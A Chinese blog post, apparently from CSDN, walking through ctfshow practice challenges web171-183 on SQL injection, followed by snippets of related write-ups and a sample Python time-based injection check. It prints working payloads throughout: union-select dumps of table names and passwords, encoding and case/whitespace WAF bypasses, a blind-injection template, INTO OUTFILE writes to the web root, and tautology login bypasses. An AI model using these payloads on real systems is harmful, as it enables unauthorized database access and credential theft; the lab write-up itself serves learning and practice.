CTFSHOW-WEB入门SQL注入部分(大概是长期更新)

最新推荐文章于 2025-10-23 15:25:11 发布
原创 最新推荐文章于 2025-10-23 15:25:11 发布 · 682 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文分享了作者在解决一系列CTF比赛中的SQL注入题目的过程,包括基础SQL注入手法、使用不同编码方式绕过WAF、利用文件写入及特殊字符绕过等技巧,并附有具体案例解析。

SQL注入


不一定会所有题都放上来(懒) 但是我尽量

0x01 web 171

在这里插入图片描述
总算是开始刷sql注入题了 之前学了 但是没写几题 也算个纯萌新了 所以基础题会细一点 也为了加强自己记忆在这里插入图片描述
1,2,3都能回显 继续直接爆表名

1'union select 1,2,table_name from information_schema.tables where table_schema=database() --+

在这里插入图片描述
直接爆字段 记得ctfshow_user要加'' 我试了半天不知道哪出问题 还得去翻Y4大佬的博客才发现问题 tcl

1' union select 1,2,column_name from information_schema.columns where table_name='ctfshow_user'  --+

在这里插入图片描述
然后就拿到了

1' union select id,username,password from ctfshow_user --+

0x02 web172

先放个撸猫界面源码里的注释
在这里插入图片描述
然后看题 发现已经给了表名ctfshow_user2

我自己的莫名其妙方法

随便试试回显在这里插入图片描述
然后 我好像莫名其妙干出来了
1' union select 1,password from ctfshow_user2 --+ 直接出了 但是
1' union select username,password from ctfshow_user2 --+出不来
应该是按照题目给的 username叫flag 所以查询语句查不出 但是直接干password就行

下来是Y4大佬的解法

不能有flag字段 所以尝试用编码 这里大佬用的是base64和hex
-1' union select to_base64(username),hex(password) from ctfshow_user2 --+ 然后拿最后一行解码 拿到flag
Y4👴tql

0x03 web173

同上

0x04 web174(已补)

先前因为脚本水平太辣了 导致跳过了本题 后来看了各路大佬的脚本之后 就尝试写了一下脚本 这里就不贴了 跑了2分钟才出答案的脚本实在太垃圾了 算了 放一条脚本中爆破的那句话 懂了原理 你也就会写脚本了(这是payload 也就是在sql查询中的语句 他的if语句是true返回第一个 错了返回第二个)

?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),%d,1))<%d,'nice','dddd') -- -"%(i,j)

0x05 web 175

1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--

写进目录 访问即可

0x06 web176

不知道waf是啥 就猜 发现union select不行 然后夏姬八试 发现好像是过滤了select 这里可以直接利用大小写过滤

1' union Select 1,password,3 from ctfshow_user --+

然后从Y4👴的blog里面发现 可以直接万能密码1' or 1=1--+ 我还是tcl

0x07 web177-179(久违的更新 摸鱼人回来补题辣)

177-178
大概过滤了空格和注释 用url编码绕了 万能语句通杀
1'or%091=1%23

179
emmmm 可能是群主的waf少加了一个%0c?

1'or%0c1=1%23

顺便在别人的博客发现 原来万能密码可以不用空格也行 feng师傅tql
顺便atao师傅tql(偌大的ctfshow竟然只有我是fw)

1'or'1'='1'%23

0x08 web 180-182

似乎是%23被过滤掉了 至于为什么payload是id=26 我也没明白
因为到22开始就没有回显了 为什么不猜22呢

(后来看到有大佬用burp跑出来的26

首先是群主的payload(第一个单引号前需要输入一个没有的数)
180181通杀

111'or(id=26)and'1'='1

原理是看了feng师傅的博客
通过上面给的查询语句来构造

1.where username !='flag' and id = ''or(id=26)and'1'='1' limit 1;";
 and优先级>or也就是
2.(username !='flag' and id = '')  or  (id=26and'1'='1')

where输出的是1那条 所以出来了(我还是tcl)
然后还有一种就是

-1'||id='26'||'   这个语句大伙把他带入搜索语句里面就懂了

0x09 web183

首先看博客学习regexp()

ctfshow web入门 sql注入
HoAd'blog
02-10 842
ctfshow web入门 sql注入 171 正常的手工注入过程 查数据库 1' union select 1,database(),3-- - 查表名 1' union select 1,table_name,3 from information_schema.tables where table_schema=database() -- - 查列名 1' union select 1,column_name,3 from information_schema.columns where table
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 433
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
CTFshow SQL注入
z
10-23 309
SQL注入技术总结 本文总结了SQL注入的多种绕过技术,包括: 基础注入:通过拼接恶意SQL语句(如web171的1' or 1=1) 联合查询:利用UNION SELECT获取其他表数据(web172) 编码绕过:使用HEX/base64编码(web173) 正则过滤绕过:通过REPLACE函数处理数字(web174) 文件导出:使用into outfile导出数据(web175) 空格绕过:采用注释、特殊字符等替代空格(web177-183) 高级技术:REGEXP正则匹配(web183)、GROUP
ctfshow web175-183
akxnxbshai的博客
03-14 6464
Web 175 if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))) 刚开始不知道这句话是什莫意思,还在尝试之前的方法,发现没用。 \xnn 匹配ASCII代码中十六进制代码为nn的字符 [\x00-\x7f] 匹配ASCII值从0-127的字符 所以ASCII值得0-127都被过滤了,select没法用了。 只能盲注了,试一下 1' and sleep(6)--+ 发现确实有延迟,所以可以考虑时间盲注。 时间盲注: 通过时间
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 6258
ctfshow 靶场 web入门 sql注入系列
CTFshow-WEB入门-SQL注入()
feng的博客
02-08 2162
web199 很懵。。。把括号给过滤了,所以varchar(255)就不能用了,考虑改成其他的类型,但是不知道到底哪里出了问题,每次一改不是没效果,就是查不出来东西。一旦alter出错就要重新启容器,很烦。 看了一下y4师傅的姿势,服了 1;show tables; ctfshow_user 对,最简单的方法,一直都没想起来,我太菜了。。。 web200 同上 web201 开始学习sqlmap的使用。 sqlmap的使用手册:sqlmap 不过因为是纯英文,英文太菜的我肯定看不太懂,不过也不需要多深入的
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 512
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
CTFSHOW-web入门-sql注入web201——web213)(系统练习sqlmap)
JL20050725的博客
08-18 920
这次过滤了*空格与=,那么便不能用/**/来替换空格了,可以用+替换空格,用like替换等于。对应的绕waf函数是,space2plus.py,equaltolike.py。但是经过我的测试发现无法成功,并且内置绕过空格的现在都不好用了。我们可以自己写一个自定义的绕waf脚本。可以采用: Tab %09、换行符 %0A、回车符 : %0D 代替空格。这里我参考了my6n师傅的做法。为了不影响原本的 tamper,在tamper目录下新建一个Mytamper目录(用于存放自定义的脚本)。
ctfshow web入门 SQl注入web171--web179
2301_81040377的博客
04-18 690
就能一次性查出25和26的,如果25存在就直接输出flag了,不然的话26存在也行。反正这种盲注问题用脚本就行了学的话看一下这篇文章。过滤了很简单的,当然是select啦,大小写绕过。还用用脚本注入的,但是我还没有成功过所以就…时间盲注,参考下面的文章,还是脚本做。,9999不存在时会查询id=3。我不知道怎么整的,看出是布尔盲注。进行猜测表格的id只有24个。没反应没事我们直接访问试试。是网站文件默认存放位置。本地测试,查询id为。还是base64解码。
ctfshow- sql注入(web入门
..
11-19 2043
web174 这道题可以先在查询框中随便查询1或2或3,发现没有回显,猜测一下可能是盲注。 首先用bp抓包试一下,得到关键信息 http://f5096abc-7db4-4448-8da0-fccd604899d9.challenge.ctf.show/api/v3.php?id=11&page=1&limit=10 用脚本尝试一下没有回显信息,根据前面的经验,这是第四题尝试改为v4.php?id=1,发现出现回显信息。 我们可以这样写脚本 import r.
CTFshow——web入门——sql注入
h_adam的博客
03-14 7116
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
ctfshow web入门--sql注入
2402_87078084的博客
02-25 498
或者:1' union select 1,database(),3--+闭合方式确定后测试回显位置,发现有3列(到4时报错)不报错,所以接下来尝试。
ctfshow web 入门 sql注入
wsitcj的博客
02-23 344
171、常规题型(需要把前面数字换为-1,注释用 --+) 查数据库 payload = “-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+” 查列名 payload="-1’union select 1,2,group_concat(column_name) from information_schema.columns where ta
ctfshow-web入门-sql注入web191-web195)
Welcome To Myon'Blog !
08-07 1508
我们不指定第三个参数,就可以实现和 left 和 right 一样的效果。密码只能是数字,过滤了空格,采用反引号包裹绕过,题目已经说了是堆叠注入,这里直接修改用户名和密码:
ctfshow web入门 sql注入(持续更新
Lum1n0us's Blog
07-13 1522
文章目录web171web172web173web174web175web176web177web178 web171 第一题嘛,都是最基础的,单引号闭合,用联合查询注入即可。 1' order by 3-- - -1' union select 1,2,3-- - # 库名是ctfshow_web -1' union select 1,database(),3-- - # 表名是ctfshow_user -1' union select 1,group_concat(table_name),3 fro
ctfshowweb入门sql注入
jie_a的博客
05-29 275
芜湖,刚刚考完科目三,又是开始学习的一天 web184 之前的懒得重新写了, 这里用"right join"右连接来把两个表连接起来进行查询pass字段,后面的单引号可以用16进制编码绕过 RIGHT JOIN(右连接) 用于获取右表所有记录,即使左表没有对应匹配的记录 过滤了where 所以我们用 on 过滤了单引号 所以我们用char(99) =c char表 :char表 回显43; 然后我们写个脚本 import requests url='http://1f6a8d55-3dd2-4924-a
ctfshow-web入门-sql注入web196-web200)堆叠注入
Welcome To Myon'Blog !
08-08 875
这里把 create 和 drop 都过滤了,那么我们直接用 insert 插入来覆盖 pass 和 username 的值。其中 $row[0] 表示从数据库查询结果中提取的某一行的第一个字段值,我们可以使用 select 来设置$row[0] 的值,再提交我们设置的 password 满足两者相等,payload:还是堆叠注入,显示过滤了 select 实际并没有。
ctfshow笔记WEBsqlSQL
m0_46625346的博客
08-04 590
web171 使用SQL语句 1’ order by 3-- -回显正常 而使用SQL语句 1’ order by 4-- -显示错误,这说明共3个字段。 1’ union select 1,database(),3-- - 库名database( )出来了:ctfshow_web 1’ union select 1,3,group_concat(table_name) from information_schema.tables where table_schema=‘ctfshow_web-- -
ctfshow web入门 sql注入184
最新发布
11-09
提供的参考引用中未包含ctfshow平台web入门第184题SQL注入的相关内容,所以无法根据引用提供该题的解题方法。不过一般CTFSQL注入题的常见解题步骤如下: ### 1. 确认注入点 通过构造特殊的输入,如单引号 `'`、双引号 `"`、括号 `()` 等,观察页面返回的错误信息或页面变化,以此判断是否存在注入点。例如,在输入框输入 `'` 后,如果页面出现SQL错误提示,那么很可能存在注入点。 ### 2. 判断注入类型 常见的注入类型有数字型、字符型、布尔型、时间型等。 - 数字型注入:在URL参数或表单输入中直接输入数字,可通过增减数字或构造简单的数学运算(如 `1+1`)来判断。 - 字符型注入:输入需要用引号包裹,如 `' or 1=1 --`。 - 布尔型注入:通过构造条件语句,根据页面返回的不同结果(如页面正常显示或报错)来判断条件是否成立。 - 时间型注入:当页面没有明显的错误信息或不同结果显示时,可通过构造 `sleep()` 等函数来判断,若页面响应时间明显变长,则存在时间型注入。 ### 3. 确定列数 使用 `order by` 语句来确定查询结果的列数。例如,输入 `' order by 3 --`,若页面正常显示,而输入 `' order by 4 --` 页面报错,则说明查询结果有3列。 ### 4. 联合查询 在确定列数后,使用 `union select` 语句进行联合查询。例如,若确定列数为3,则可输入 `' union select 1,2,3 --`,若页面能正常显示 `1`、`2`、`3` 的值,说明可以通过联合查询获取更多信息。 ### 5. 获取数据库信息 - 查询数据库名:`' union select 1,database(),3 --` - 查询表名:`' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --` - 查询列名:`' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='表名' --` ### 6. 获取数据 在知道表名和列名后,就可以获取具体的数据。例如:`' union select 1,2,列名 from 表名 --` 以下是一个简单的Python脚本示例,用于时间型注入判断: ```python import requests import time url = "http://example.com/search.php" payload_true = "?keyword=' or sleep(5) --" payload_false = "?keyword=' or sleep(0) --" start_true = time.time() requests.get(url + payload_true) end_true = time.time() time_true = end_true - start_true start_false = time.time() requests.get(url + payload_false) end_false = time.time() time_false = end_false - start_false if time_true - time_false > 4: print("存在时间型SQL注入") else: print("未发现时间型SQL注入") ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值